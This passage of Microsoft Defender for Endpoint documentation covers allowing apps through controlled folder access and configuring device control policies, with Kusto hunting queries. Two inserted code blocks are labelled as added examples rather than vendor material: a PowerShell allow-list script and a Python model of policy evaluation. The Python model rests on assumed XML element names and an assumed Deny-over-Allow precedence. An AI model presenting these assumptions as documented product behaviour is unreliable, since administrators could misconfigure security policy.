starts. For example, an update service will continue to trigger events after it's allowed
until it is stopped and restarted.

Use the Windows Security app to allow specific apps

1. Open the Windows Security app by searching the start menu for Security.
2. Select the Virus & threat protection tile (or the shield icon on the left menu bar)
and then select Manage ransomware protection.

3. Under the Controlled folder access section, select Allow an app through
Controlled folder access

4. Select Add an allowed app and follow the prompts to add apps.

Use Group Policy to allow specific apps


1. On your Group Policy management device, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. In the Group Policy Management Editor, go to Computer configuration and


select Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus >
Windows Defender Exploit Guard > Controlled folder access.

4. Double-click the Configure allowed applications setting and then set the option
to Enabled. Select Show.

5. Add the full path to the executable in Value name. Set Value to 0 . For example, to
allow the Command Prompt set Value name as C:\Windows\System32\cmd.exe .
Value should be set to 0 .

Use PowerShell to allow specific apps

1. Type PowerShell in the Start menu, right-click Windows PowerShell and then
select Run as administrator.

2. Enter the following cmdlet:

PowerShell

Add-MpPreference -ControlledFolderAccessAllowedApplications "<the app that should be allowed, including the path>"

For example, to add the executable test.exe located in the folder C:\apps, the
cmdlet would be as follows:

PowerShell

Add-MpPreference -ControlledFolderAccessAllowedApplications "c:\apps\test.exe"

Continue to use Add-MpPreference -ControlledFolderAccessAllowedApplications to
add more apps to the list. Apps added using this cmdlet will appear in the
Windows Security app.

Important

Use Add-MpPreference to append apps to the list. Running
Set-MpPreference -ControlledFolderAccessAllowedApplications replaces the existing
list with whatever value you supply.

Use MDM CSPs to allow specific apps

Use the
./Vendor/MSFT/Policy/Config/Defender/ControlledFolderAccessAllowedApplications
configuration service provider (CSP) to allow apps to make changes to protected folders.
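Putting the preceding folder and app steps together, as an added example that is not part of the original article: the script below appends protected folders and allowed apps with Add-MpPreference (never Set-MpPreference, which would replace the list), skips entries that are already present, refuses scripting engines because controlled folder access cannot trust them, checks that each app exists at the exact path that will be allowed (an allow entry for a path that does not exist permits nothing), and records the Authenticode signer so the allow decision can be reviewed later. The folder and app paths and the list of script-host executable names are placeholders and assumptions; run it in an elevated PowerShell session.

```powershell
# Added example (not Microsoft's code): append protected folders and allowed
# apps to controlled folder access without clobbering the existing lists.
# Paths below are placeholders; the script-host list is an assumption.

$foldersToProtect = @('D:\Finance\Ledgers', 'D:\Projects')    # assumed paths
$appsToAllow      = @('C:\Program Files\Acme\AcmeSync.exe')   # assumed path

# Scripting engines are never trusted by the feature, so refuse them up front
# rather than adding an entry that will have no effect.
$scriptHosts = @('powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe')

$current = Get-MpPreference

foreach ($folder in $foldersToProtect) {
    if (-not (Test-Path -LiteralPath $folder -PathType Container)) {
        Write-Warning "Skipping '$folder': folder does not exist on this device."
        continue
    }
    if ($current.ControlledFolderAccessProtectedFolders -contains $folder) {
        Write-Host "Already protected: $folder"
        continue
    }
    # Add-MpPreference appends; Set-MpPreference would replace the whole list.
    Add-MpPreference -ControlledFolderAccessProtectedFolders $folder
    Write-Host "Protected: $folder"
}

foreach ($app in $appsToAllow) {
    $leaf = (Split-Path -Path $app -Leaf).ToLowerInvariant()
    if ($scriptHosts -contains $leaf) {
        Write-Warning "Refusing '$app': scripting engines cannot be allowed through controlled folder access."
        continue
    }
    if (-not (Test-Path -LiteralPath $app -PathType Leaf)) {
        # The allow entry is path-specific: the same binary in another folder stays blocked.
        Write-Warning "Skipping '$app': no file at that exact path."
        continue
    }
    # Record who signed the binary so the allow decision is reviewable.
    $sig = Get-AuthenticodeSignature -FilePath $app
    if ($sig.Status -ne 'Valid') {
        Write-Warning "'$app' has signature status '$($sig.Status)'; verify its trustworthiness before allowing."
        continue
    }
    if ($current.ControlledFolderAccessAllowedApplications -contains $app) {
        Write-Host "Already allowed: $app"
        continue
    }
    Add-MpPreference -ControlledFolderAccessAllowedApplications $app
    # A running process keeps triggering events until it is restarted.
    Write-Host "Allowed: $app (signer: $($sig.SignerCertificate.Subject)); restart it for the change to take effect"
}

# Show the effective configuration so the change can be verified.
Get-MpPreference |
    Select-Object EnableControlledFolderAccess,
                  ControlledFolderAccessProtectedFolders,
                  ControlledFolderAccessAllowedApplications |
    Format-List
```

The signature check is a review aid, not a trust decision: an unsigned or self-signed binary may still be a legitimate line-of-business tool, but it should be allowed deliberately, after you have confirmed where it came from, rather than because it showed up in the audit log.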

Allow signed executable files to access protected folders

Microsoft Defender for Endpoint certificate and file indicators can allow signed
executable files to access protected folders. For implementation details, see Create
indicators based on certificates.

Note

This does not apply to scripting engines, including PowerShell.

Customize the notification


For more information about customizing the notification when a rule is triggered and
blocks an app or file, see Configure alert notifications in Microsoft Defender for
Endpoint.

See also
Protect important folders with controlled folder access
Enable controlled folder access
Enable attack surface reduction rules



Device control in Microsoft Defender for
Endpoint
Article • 02/14/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Device control capabilities in Microsoft Defender for Endpoint enable your security team
to control whether users can install and use peripheral devices, like removable storage
(USB thumb drives, CDs, disks, etc.), printers, Bluetooth devices, or other devices with
their computers. Your security team can configure device control policies to configure
rules like these:

Prevent users from installing and using certain devices (like USB drives)
Prevent users from installing and using any external devices with specific
exceptions
Allow users to install and use specific devices
Allow users to install and use only BitLocker-encrypted devices with Windows
computers

This list is intended to provide some examples. It's not an exhaustive list; there are other
examples to consider (see the device control in Windows section in this article).

Device control helps protect your organization from potential data loss, malware, or
other cyberthreats by allowing or preventing certain devices to be connected to users'
computers. With device control, your security team can determine whether and what
peripheral devices users can install and use on their computers.

Device control in Windows


This section lists scenarios for device control in Windows.

Tip

If you're using Mac, device control can control access to Bluetooth, iOS devices,
portable devices such as cameras, and removable media such as USB devices. See
Device Control for macOS.

Select a tab, review the scenarios, and then identify the type of device control policy to
create.

Removable storage

Scenario | Device control policy
Prevent installation of a specific USB device | Device control in Windows. See Device control policies.
Prevent installation of all USB devices while allowing installation of only an authorized USB | Device control in Windows. See Device control policies.
Prevent Write and Execute access to all but allow specific approved USBs | Device control in Defender for Endpoint. See Device control policies.
Audit Write and Execute access for all but block specific blocked USBs | Device control in Defender for Endpoint. See Device control policies.
Block read and execute access to a specific file extension | Device control in Microsoft Defender. See Device control policies.
Block people from accessing removable storage when the machine isn't connected to the corporate network | Device control in Microsoft Defender. See Device control policies.
Block write access to removable data drives not protected by BitLocker | Device control in Windows. See BitLocker.
Block write access to devices configured in another organization | Device control in Windows. See BitLocker.
Prevent copying of sensitive files to USB | Endpoint DLP

Supported devices

Device control supports Bluetooth devices, CD/ROMs and DVD devices, printers, USB
devices, and other types of portable devices. On a Windows device, based on the driver,
some peripheral devices are marked as removable. The following table lists examples of
devices that device control supports with their primary_id values and media class
names:

Device type | PrimaryId in Windows | primary_id in macOS | Media class name
Bluetooth devices | (not applicable) | bluetoothDevice | Bluetooth Devices
CD/ROMs, DVDs | CdRomDevices | (not applicable) | CD-Roms
iOS devices | (not applicable) | appleDevice | (none listed)
Portable devices (such as cameras) | (not applicable) | portableDevice | (none listed)
Printers | PrinterDevices | (not applicable) | Printers
USB devices (removable media) | RemovableMediaDevices | removableMedia | USB
Windows Portable Devices | WpdDevices | (not applicable) | Windows Portable Devices (WPD)

Categories of Microsoft device control capabilities

Device control capabilities from Microsoft can be organized into three main categories:
device control in Windows, device control in Defender for Endpoint, and Endpoint Data
Loss Prevention (Endpoint DLP).

Device control in Windows. The Windows operating system has built-in device
control capabilities. Your security team can configure device installation settings to
prevent (or allow) users from installing certain devices on their computers. Policies
are applied at the device level, and use various device properties to determine
whether or not a user can install/use a device. Device control in Windows works
with BitLocker and ADMX templates, and can be managed using Intune.

BitLocker and Intune. BitLocker is a Windows security feature that provides
encryption for entire volumes. Together with Intune, policies can be configured
to enforce encryption on devices using BitLocker for Windows (and FileVault for
Mac). For more information, see Disk encryption policy settings for endpoint
security in Intune.

Administrative Templates (ADMX) and Intune. You can use ADMX templates to
create policies that restrict or allow specific types of USB devices to be used
with computers. For more information, see Restrict USB devices and allow
specific USB devices using ADMX templates in Intune.

Device control in Defender for Endpoint. Device control in Defender for Endpoint
provides more advanced capabilities and is cross platform. You can configure
device control settings to prevent (or allow) users to have Read, Write, or Execute
access to content on removable storage devices. You can define exceptions, and
you can choose to employ audit policies that detect but don't block users from
accessing their removable storage devices. Policies are applied at the device level,
user level, or both. Device control in Microsoft Defender can be managed using
Intune.
Device control in Microsoft Defender and Intune. Intune provides a rich
experience for managing complex device control policies for organizations. You
can configure and deploy device restriction settings in Defender for Endpoint,
for example. See Configure device restriction settings in Microsoft Intune.

Endpoint data loss prevention (Endpoint DLP). Endpoint DLP monitors sensitive
information on devices that are onboarded to Microsoft Purview solutions. DLP
policies can enforce protective actions on sensitive information and where it's
stored or used. Learn about Endpoint DLP.

See the device control scenarios section (in this article) for more details about these
capabilities.

Device control samples and scenarios


Device control in Defender for Endpoint provides your security team with a robust
access control model that enables a wide range of scenarios (see Device control
policies). We have put together a GitHub repository that contains samples and scenarios
you can explore. See the following resources:

Device control samples README
Getting started with device control samples on Windows devices
Device control for macOS samples

If you're new to device control, see Device control walkthroughs.

Prerequisites

Device control in Defender for Endpoint can be applied to devices running Windows 10
or Windows 11 that have the anti-malware client version 4.18.2103.3 or later. Currently,
device control is not supported on servers.

4.18.2104 or later: adds SerialNumberId, VID_PID, file path-based GPO support, and
ComputerSid.

4.18.2105 or later: adds wildcard support for
HardwareId/DeviceId/InstancePathId/FriendlyNameId/SerialNumberId, the combination
of a specific user on a specific machine, and removable SSD (such as a SanDisk Extreme
SSD)/USB Attached SCSI (UAS) support.

4.18.2107 or later: adds Windows Portable Device (WPD) support (for mobile devices,
such as tablets); adds AccountName to advanced hunting.

4.18.2205 or later: expands the default enforcement to printers. If you set the default
to Deny, it blocks printers as well, so if you only want to manage storage, make sure
to create a custom policy that allows printers.

4.18.2207 or later: adds file support; the common use case is blocking
Read/Write/Execute access to specific files on removable storage. Adds network and
VPN connection support; the common use case is blocking access to removable storage
when the machine isn't connected to the corporate network.

For Mac, see Device Control for macOS.

Next steps
Device control walkthroughs
Learn about Device control policies
View device control reports


Device control walkthroughs
Article • 02/14/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

This article describes different ways to see how device control works. Beginning with
default settings, each section describes how to configure device control to achieve
certain objectives.

Explore the default state of device control

By default, device control is disabled and there are no restrictions on which devices can
be added. The auditing of basic device control events is enabled for devices that are
onboarded to Defender for Endpoint. This activity can be seen in the device control
report. Filtering on the built-in PnP Audit Policy shows devices that are connected to
the endpoints in the environment.

Device control in Defender for Endpoint identifies a device based on its properties.
Device properties are visible by selecting an entry in the report.

The Device ID, Vendor ID (VID), Serial number, and Bus type can all be used to identify
a device (see Device control policies in Microsoft Defender for Endpoint). This data is
also available in advanced hunting, by searching for the Plug and Play Device Connected
action (PnpDeviceConnected), as shown in the following example query:

Kusto

DeviceEvents
| where ActionType == "PnpDeviceConnected"
| extend parsed=parse_json(AdditionalFields)
| extend MediaClass = tostring(parsed.ClassName)
| extend MediaDeviceId = tostring(parsed.DeviceId)
| extend MediaDescription = tostring(parsed.DeviceDescription)
| extend MediaSerialNumber = tostring(parsed.SerialNumber)
| project Timestamp, DeviceId, DeviceName, AccountName, AccountDomain,
MediaClass, MediaDeviceId, MediaDescription, MediaSerialNumber, parsed
| order by Timestamp desc

The status of device control (enabled/disabled, default enforcement, and last policy
update) is available on a device via Get-MpComputerStatus, as illustrated in the
following snippet:

PowerShell

DeviceControlDefaultEnforcement :
DeviceControlPoliciesLastUpdated : 1/3/2024 12:51:56 PM
DeviceControlState : Disabled

Change the device control state to Enabled on a test device. Make sure the policy is
applied by checking Get-MpComputerStatus, as illustrated in the following snippet:

PowerShell

DeviceControlDefaultEnforcement : DefaultAllow
DeviceControlPoliciesLastUpdated : 1/4/2024 10:27:06 AM
DeviceControlState : Enabled

In the test device, insert a USB drive. There are no restrictions; all types of access (read,
write, execute, and print) are allowed. A record is created to show that a USB device was
connected. You can use the following example advanced hunting query to see it:

Kusto

DeviceEvents
| where ActionType == "PnpDeviceConnected"
| extend parsed=parse_json(AdditionalFields)
| extend MediaClass = tostring(parsed.ClassName)
| extend MediaDeviceId = tostring(parsed.DeviceId)
| extend MediaDescription = tostring(parsed.DeviceDescription)
| extend MediaSerialNumber = tostring(parsed.SerialNumber)
| where MediaClass == "USB"
| project Timestamp, DeviceId, DeviceName, AccountName, AccountDomain,
MediaClass, MediaDeviceId, MediaDescription, MediaSerialNumber, parsed
| order by Timestamp desc

This example query filters the events by MediaClass. The default behavior can be
changed to deny all devices, or to exclude families of devices from device control.
Change the default behavior to deny, and then set device control only to apply to
removable storage.

For Intune, use a custom profile to set the device control settings, as follows:

Set ./Vendor/MSFT/Defender/Configuration/DeviceControlEnabled to 1
Set ./Vendor/MSFT/Defender/Configuration/DefaultEnforcement to 2
Set ./Vendor/MSFT/Defender/Configuration/SecuredDevicesConfiguration to
RemovableMediaDevices

Deploy your policy to the test device. Use Get-MpComputerStatus to confirm that the
default enforcement is set to Deny, as illustrated in the following snippet:

PowerShell

DeviceControlDefaultEnforcement : DefaultDeny
DeviceControlPoliciesLastUpdated : 1/4/2024 10:27:06 AM
DeviceControlState : Enabled

Remove, and reinsert the USB device in the test machine. Try to open the drive. The
drive isn't accessible, and a message appears which indicates that access is denied.

7 Note

Samples, instructions, and examples are available here.

Step 1: Deny all removable media

In order to customize the behavior, device control uses policies that are a combination
of groups and rules. Start by deploying a policy that denies all access to all removable
storage devices, and audits the event by sending a notification to the portal and the
user. The following image summarizes these settings:

For the purposes of controlling access, devices are organized into Groups. This policy
uses a group called All removable media devices . Once this policy is deployed to the
test device, reinsert the USB. A notification appears, indicating that device access is
restricted.

The event also appears within 15 minutes in advanced hunting. You can use the
following example query to view the results:

Kusto

DeviceEvents
| where ActionType == "RemovableStoragePolicyTriggered"
| extend parsed=parse_json(AdditionalFields)
| extend RemovableStorageAccess = tostring(parsed.RemovableStorageAccess)
| extend RemovableStoragePolicyVerdict =
tostring(parsed.RemovableStoragePolicyVerdict)
| extend MediaBusType = tostring(parsed.BusType)
| extend MediaClassGuid = tostring(parsed.ClassGuid)
| extend MediaClassName = tostring(parsed.ClassName)
| extend MediaDeviceId = tostring(parsed.DeviceId)
| extend MediaInstanceId = tostring(parsed.DeviceInstanceId)
| extend MediaName = tostring(parsed.MediaName)
| extend RemovableStoragePolicy = tostring(parsed.RemovableStoragePolicy)
| extend MediaProductId = tostring(parsed.ProductId)
| extend MediaVendorId = tostring(parsed.VendorId)
| extend MediaSerialNumber = tostring(parsed.SerialNumber)
| project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName,
ActionType, RemovableStorageAccess, RemovableStoragePolicyVerdict,
MediaBusType, MediaClassGuid, MediaClassName, MediaDeviceId,
MediaInstanceId, MediaName, RemovableStoragePolicy, MediaProductId,
MediaVendorId, MediaSerialNumber, FolderPath, FileSize
| order by Timestamp desc

7 Note

You can view up to 300 events per device per day with advanced hunting.
Select the event to view information about the policy and the device.

Step 2: Allow access for authorized USB devices

To grant access to a set of authorized USB devices, set up a group to identify those
devices. We call our group Authorized USBs, and used the settings depicted in the
following image:

In our example, the authorized USBs group contains a single device identified by its
InstancePathId. Before deploying the sample, you can change the value to the
InstancePathId for a test device. See Using Windows Device Manager to determine
device properties and Using reports and advanced hunting to determine properties of
devices for details on how to find the correct value.

Notice that the authorized USB group is excluded from the deny-all policy. This ensures
that those devices are evaluated for the other policies. Policies aren't evaluated in order,
so each policy should be correct if evaluated independently. Once the policy is
deployed, reinsert the approved USB device. You should see that there's full access to
the device. Insert another USB, and confirm that access is blocked for that device.

Device control has lots of ways to group devices based on properties. For more
information, see Device control policies in Microsoft Defender for Endpoint.

Step 3: Allow different levels of access for different types of devices

To create different behaviors for different devices, place them into separate groups. In
our example, we use a group called Read Only USBs . The following image shows the
settings we used:

In our example, the Read Only USB group contains a single device identified by its
VID_PID. Before deploying the sample, you can change the value of VID_PID to that of a
second test device.

Once the policy is deployed, insert an authorized USB. You should see that full access is
allowed. Now insert the second test device (Read Only USB). You can access the device
with read-only permissions. Attempt to create a new file, or make changes to a file, and
you should see that device control blocks it.

If you insert any other USB device, it should be blocked due to the "Deny all other USBs"
policy.

Step 4: Allow different levels of access to devices for specific users or groups

Device control allows you to further restrict access using conditions. The simplest
condition is a user condition. In device control, users and groups are identified by their
Security Identifier (SID).

The following screenshot shows the settings we used for our example:

By default, the sample uses the Global SID of S-1-1-0. Before deploying the policy, you
can change the SID associated with the authorized USBs (writeable USBs) to User1 and
change the SID associated with the Read Only USBs to User2.

Once the policy is deployed, only User 1 has write access to the Authorized USBs, and
only User 2 has read access to the ReadOnly USBs.

Device control also supports group SIDs. Change the SID in the read-only policy to a
group that contains User2 . Once the policy is redeployed, the rules are the same for
User 2 or any other user in that group.

7 Note

For groups that are stored in Microsoft Entra, use the object id instead of the SID to
identify groups of users.

Next steps
Understand Device control policies
Deploy and manage device control with Intune
Deploy and manage device control with Group Policy
View device control reports

Device control policies in Microsoft
Defender for Endpoint
Article • 02/14/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

This article describes device control policies, rules, entries, groups, and advanced
conditions. Essentially, device control policies define access for a set of devices. The
devices that are in scope are determined by a list of included device groups and a list of
excluded device groups. A policy applies if the device is in all of the included device
groups and none of the excluded device groups. If no policies apply, then the default
enforcement is applied.

By default, device control is disabled, so access to all types of devices is allowed. To
learn more about device control, see Device control in Microsoft Defender for Endpoint.

Controlling default behavior

When device control is enabled, it's enabled for all device types by default. The default
enforcement can also be changed from Allow to Deny. Your security team can also
configure the types of devices that device control protects. The following table
illustrates how various combinations of settings change the access control decision.

Device control enabled: No
Default behavior: Access is allowed
Device types: CD/DVD drives; Printers; Removable media devices; Windows portable devices

Device control enabled: Yes
Default behavior: (Not specified) Access is allowed
Device types: CD/DVD drives; Printers; Removable media devices; Windows portable devices

Device control enabled: Yes
Default behavior: Deny
Device types: CD/DVD drives; Printers; Removable media devices; Windows portable devices

Device control enabled: Yes
Default behavior: Deny removable media devices and printers
Device types: Printers and removable media devices (blocked); CD/DVD drives and Windows
portable devices (allowed)

When device types are configured, device control in Defender for Endpoint ignores
requests to other device families.

For more information, see the following articles:

Deploy and manage device control with Intune
Deploy and manage device control with Group Policy

Policies
To further refine access to devices, device control uses policies. A policy is a set of rules
and groups. How rules and groups are defined varies slightly among management
experiences and operating systems, as described in the following table.

Management tool (operating system): How rules and groups are managed

Intune – Device control policy (Windows): Device and printer groups can be managed as
reusable settings and included in rules. Not all features are available in the device
control policy (see Deploy and manage device control with Microsoft Intune).

Intune – Custom (Windows): Each group/rule is stored as an XML string in a custom
configuration policy. The OMA-URI contains the GUID of the group/rule. The GUID must
be generated.

Group Policy (Windows): The groups and rules are defined in separate XML settings in
the Group Policy Object (see Deploy and manage device control with Group Policy).

Intune (Mac): The rules and policies are combined into a single JSON and included in
the mobileconfig file that is deployed by using Intune.

JAMF (Mac): The rules and policies are combined into a single JSON and configured by
using JAMF as the device control policy (see Device Control for macOS).

Rules and groups are identified by Globally Unique Identifiers (GUIDs). If device control
policies are deployed using a management tool other than Intune, the GUIDs must be
generated. You can generate the GUIDs by using PowerShell.

For schema details, see JSON schema for Mac .

Rules
A rule defines the list of included groups and a list of excluded groups. For the rule to
apply, the device must be in all of the included groups and none of the excluded
groups. If the device matches the rule, then the entries for that rule are evaluated. An
entry defines the action and notification options applied, if the request matches the
conditions. If no rules apply or no entries match the request then the default
enforcement is applied.

For example, to allow write access for some USB devices, and read access for all other
USB devices, use the following policies, groups, and entries with default enforcement set
to deny.

Group: All Removable Storage Devices
Description: Removable Storage Devices

Group: Writeable USBs
Description: List of USBs where write access is permitted

Rule: Read only access for USBs
Included device groups: All Removable storage devices
Excluded device groups: Writeable USBs
Entry: Read Only Access

Rule: Write access for USBs
Included device groups: Writeable USBs
Excluded device groups: (none)
Entry: Write Access


The name of the rule appears in the portal for reporting and in the toast notification to
users, so make sure to give the rules descriptive names.

You can configure rules by editing policies in Intune, using an XML file in Windows, or
using a JSON file on Mac. Select each tab for more details.

Intune

The following image depicts configuration settings for a device control policy in
Intune:

In the screenshot, the Included ID and Excluded ID are the references to included
and excluded reusable settings groups. A policy can have multiple rules.

The ordering of the rules isn't honored by Intune. The rules can be evaluated in any
order, so make sure to explicitly exclude groups of devices that aren't in scope for
the rule.

Entries
Device control policies define access (called an entry) for a set of devices. Entries define
the action and notification options for devices that match the policy and the conditions
defined in the entry.

Entry setting: Action
Options: Allow; Deny; AuditAllow; AuditDeny

Entry setting: Notification
Options: None (default); An event is generated; The user receives notification; File
evidence is captured

If device control is configured, and a user attempts to use a device that's not allowed,
the user gets a notification that contains the name of the device control policy and the
name of the device. The notification appears once every hour after initial access is
denied.

An entry supports the following optional conditions:

Access Condition: Applies the action only to the access defined in the access mask
User Condition: Applies the action only to the user/group identified by the SID
Machine Condition: Applies the action only to the device/group identified by the
SID
Parameters Condition: Applies the action only if the parameters match (See
Advanced Conditions)

Entries can be further scoped to specific users and devices. For example, allow read
access to these USBs for this user only on this device.

Policy: Read only access for USBs
Included device groups: All Removable storage devices
Excluded device groups: Writeable USBs
Entry(ies): Read Only Access

Policy: Write access for USBs
Included device groups: Writeable USBs
Excluded device groups: (none)
Entry(ies): Write Access for User 1; Write Access for User 2 on Device Group A

All of the conditions in the entry must be true for the action to be applied.

Determine the Security ID of a User, Group, or Device

Entries can include user, group, or device restrictions based on Security ID (SID). The SID
of the user who's signed in can be retrieved by running the PowerShell command
whoami /user.

You can configure entries using Intune, an XML file in Windows, or a JSON file on Mac.
Select each tab for more details.

Intune

In Intune, the Access mask field has options, such as:

Read (Disk Level Read = 1)
Write (Disk Level Write = 2)
Execute (Disk Level Execute = 4)
Print (Print = 64)

Not all features are shown in the Intune user interface. For more information, see
Deploy and manage device control with Intune.

Groups
Groups define criteria for filtering objects by their properties. The object is assigned to
the group if its properties match the properties defined for the group.

For example:

Allowed USBs are all the devices that match any of these manufacturers
Lost USBs are all the devices that match any of these serial numbers
Allowed printers are all the devices that match any of these VID/PID

The properties can be matched in four ways: MatchAll, MatchAny, MatchExcludeAll, and
MatchExcludeAny.

MatchAll: The properties are an "And" relationship; for example, if an administrator
specifies DeviceID and InstancePathID, for every connected USB, the system checks to
see whether the USB meets both values.
MatchAny: The properties are an "Or" relationship; for example, if an administrator
specifies DeviceID and InstancePathID, for every connected USB, the system enforces as
long as the USB has either an identical DeviceID or InstancePathID value.
MatchExcludeAll: The properties are an "And" relationship, and any items that do NOT
meet them are covered. For example, if an administrator specifies DeviceID and
InstancePathID and uses MatchExcludeAll, for every connected USB, the system enforces
as long as the USB doesn't have both an identical DeviceID and InstancePathID value.
MatchExcludeAny: The properties are an "Or" relationship, and any items that do NOT
meet them are covered. For example, if an administrator specifies DeviceID and
InstancePathID and uses MatchExcludeAny, for every connected USB, the system enforces
as long as the USB doesn't have either an identical DeviceID or InstancePathID value.
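The four match types above, together with the included/excluded groups and entries described in the Rules and Entries sections, can be exercised end to end in code. The following Python model is an added example, not Microsoft's code or the product's evaluation engine: it parses a constructed group and rule XML, applies MatchAll/MatchAny/MatchExcludeAll/MatchExcludeAny with wildcard matching, checks included and excluded groups, and resolves an entry's access mask and user SID before falling back to the default enforcement. The PolicyRule, IncludedIdList, ExcludedIdList and Sid element names are assumed from the Windows device control XML schema (this article shows only Group and Entry elements), the Deny-over-Allow precedence is an assumption consistent with the walkthrough's advice to exclude authorized devices from a deny-all rule, and every GUID, SID and device ID is constructed.

```python
"""Model of how device control decides a removable-storage request.

Added example, not Microsoft's code. Groups select devices by property with
MatchAll/MatchAny/MatchExcludeAll/MatchExcludeAny (wildcards allowed); a rule
applies when the device is in all included and no excluded groups; an entry
applies when its access mask overlaps the request and its optional Sid matches
the user; otherwise default enforcement decides. PolicyRule, IncludedIdList,
ExcludedIdList and Sid are assumed from the Windows XML schema; all IDs are made up.
"""
from fnmatch import fnmatchcase
import xml.etree.ElementTree as ET

# Access-mask bits listed in the article (Intune "Access mask" options).
DISK_READ, DISK_WRITE, DISK_EXECUTE, PRINT = 1, 2, 4, 64
# DefaultEnforcementAllow = 1, DefaultEnforcementDeny = 2 (OMA-URI table).
DEFAULT_ENFORCEMENT = {1: "Allow", 2: "Deny"}

# Constructed groups: all removable storage, and one authorized vendor (VID 0781).
GROUPS_XML = """<Groups>
  <Group Id="{a1b2c3d4-0000-4000-8000-000000000001}" Type="Device">
    <MatchType>MatchAny</MatchType>
    <DescriptorIdList><PrimaryId>RemovableMediaDevices</PrimaryId></DescriptorIdList>
  </Group>
  <Group Id="{a1b2c3d4-0000-4000-8000-000000000002}" Type="Device">
    <MatchType>MatchAll</MatchType>
    <DescriptorIdList><PrimaryId>RemovableMediaDevices</PrimaryId><VID_PID>0781_*</VID_PID></DescriptorIdList>
  </Group>
</Groups>"""

# Constructed rules: deny everything except the authorized group, which one user may write to.
RULES_XML = """<PolicyRules>
  <PolicyRule Id="{b1b2c3d4-0000-4000-8000-000000000001}">
    <Name>Deny all other removable storage</Name>
    <IncludedIdList><GroupId>{a1b2c3d4-0000-4000-8000-000000000001}</GroupId></IncludedIdList>
    <ExcludedIdList><GroupId>{a1b2c3d4-0000-4000-8000-000000000002}</GroupId></ExcludedIdList>
    <Entry Id="{c1b2c3d4-0000-4000-8000-000000000001}">
      <Type>Deny</Type><Options>0</Options><AccessMask>7</AccessMask>
    </Entry>
  </PolicyRule>
  <PolicyRule Id="{b1b2c3d4-0000-4000-8000-000000000002}">
    <Name>Write access for authorized USBs</Name>
    <IncludedIdList><GroupId>{a1b2c3d4-0000-4000-8000-000000000002}</GroupId></IncludedIdList>
    <ExcludedIdList/>
    <Entry Id="{c1b2c3d4-0000-4000-8000-000000000002}">
      <Type>Allow</Type><Options>0</Options><AccessMask>7</AccessMask>
      <Sid>S-1-5-21-1111-2222-3333-1001</Sid>
    </Entry>
  </PolicyRule>
</PolicyRules>"""

def group_matches(group, device):
    """Apply the group's MatchType to its DescriptorIdList (tag = property, text = pattern)."""
    match_type = group.get("MatchType") or group.findtext("MatchType", "MatchAny")
    hits = [fnmatchcase(str(device.get(d.tag, "")).lower(), d.text.strip().lower())
            for d in group.find("DescriptorIdList")]
    # MatchAll/MatchAny decide membership; the Exclude variants cover exactly the
    # devices that do NOT meet the same criteria.
    return {"MatchAll": all(hits), "MatchAny": any(hits),
            "MatchExcludeAll": not all(hits), "MatchExcludeAny": not any(hits)}[match_type]

def rule_applies(rule, groups, device):
    """True only if the device is in every included group and in no excluded group."""
    def ids(tag):
        return [g.text.strip() for g in rule.find(tag)]
    return (all(group_matches(groups[i], device) for i in ids("IncludedIdList"))
            and not any(group_matches(groups[i], device) for i in ids("ExcludedIdList")))

def evaluate(groups_xml, rules_xml, device, user_sid, requested, default_enforcement=2):
    """Return "Allow" or "Deny" for one request; `requested` is an access-mask bit."""
    groups = {g.get("Id"): g for g in ET.fromstring(groups_xml)}
    verdicts = set()
    for rule in ET.fromstring(rules_xml):
        if not rule_applies(rule, groups, device):
            continue
        for entry in rule.findall("Entry"):
            mask, sid = int(entry.findtext("AccessMask")), entry.findtext("Sid")
            if mask & requested and (sid is None or sid == user_sid):
                verdicts.add(entry.findtext("Type"))
    if "Deny" in verdicts:   # assumption: a matching Deny outranks a matching Allow
        return "Deny"
    if "Allow" in verdicts:  # AuditAllow/AuditDeny only log and never decide access
        return "Allow"
    return DEFAULT_ENFORCEMENT[default_enforcement]

# Constructed devices and users for the walkthrough scenarios.
SANDISK = {"PrimaryId": "RemovableMediaDevices", "VID_PID": "0781_5581"}
OTHER_USB = {"PrimaryId": "RemovableMediaDevices", "VID_PID": "090C_1000"}
USER1, USER2 = "S-1-5-21-1111-2222-3333-1001", "S-1-5-21-1111-2222-3333-1002"

def demo():
    """Decisions for the situations described in walkthrough steps 1 to 4."""
    return {
        "user1_writes_authorized": evaluate(GROUPS_XML, RULES_XML, SANDISK, USER1, DISK_WRITE),
        "user2_writes_authorized": evaluate(GROUPS_XML, RULES_XML, SANDISK, USER2, DISK_WRITE),
        "user1_reads_other": evaluate(GROUPS_XML, RULES_XML, OTHER_USB, USER1, DISK_READ),
        "print_with_default_allow": evaluate(GROUPS_XML, RULES_XML, OTHER_USB, USER1, PRINT, 1),
    }
```

Running demo() shows why the walkthrough excludes the authorized group from the deny-all rule: the authorized SanDisk device is skipped by rule 1 and allowed by rule 2 only for User1, a second user falls through to the Deny default, any other USB is denied by rule 1, and a print request that no entry's mask covers is decided purely by the default enforcement.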

Groups are used two ways: to select devices for inclusion/exclusion in rules, and to filter
access for advanced conditions. This table summarizes the group types and how they're
used.

Type: Device (default)
Description: Filter devices and printers
O/S: Windows/Mac
Used in: Include/Exclude rules

Type: Network
Description: Filter network conditions
O/S: Windows
Used in: Advanced conditions

Type: VPN Connection
Description: Filter VPN conditions
O/S: Windows
Used in: Advanced conditions

Type: File
Description: Filter file properties
O/S: Windows
Used in: Advanced conditions

Type: Print Job
Description: Filter properties of the file being printed
O/S: Windows
Used in: Advanced conditions

The devices that are in scope for the policy are determined by a list of included groups
and a list of excluded groups. A rule applies if the device is in all of the included
groups and none of the excluded groups. Groups can be composed from the properties of
devices. The following properties can be used:

Property: FriendlyNameId
Description: The friendly name in Windows Device Manager
Windows devices: Y; Mac devices: N; Printers: Y

Property: PrimaryId
Description: The type of the device
Windows devices: Y; Mac devices: Y; Printers: Y

Property: VID_PID
Description: Vendor ID is the four-digit vendor code that the USB committee assigns to
the vendor. Product ID is the four-digit product code that the vendor assigns to the
device. Wildcards are supported. For example, 0751_55E0
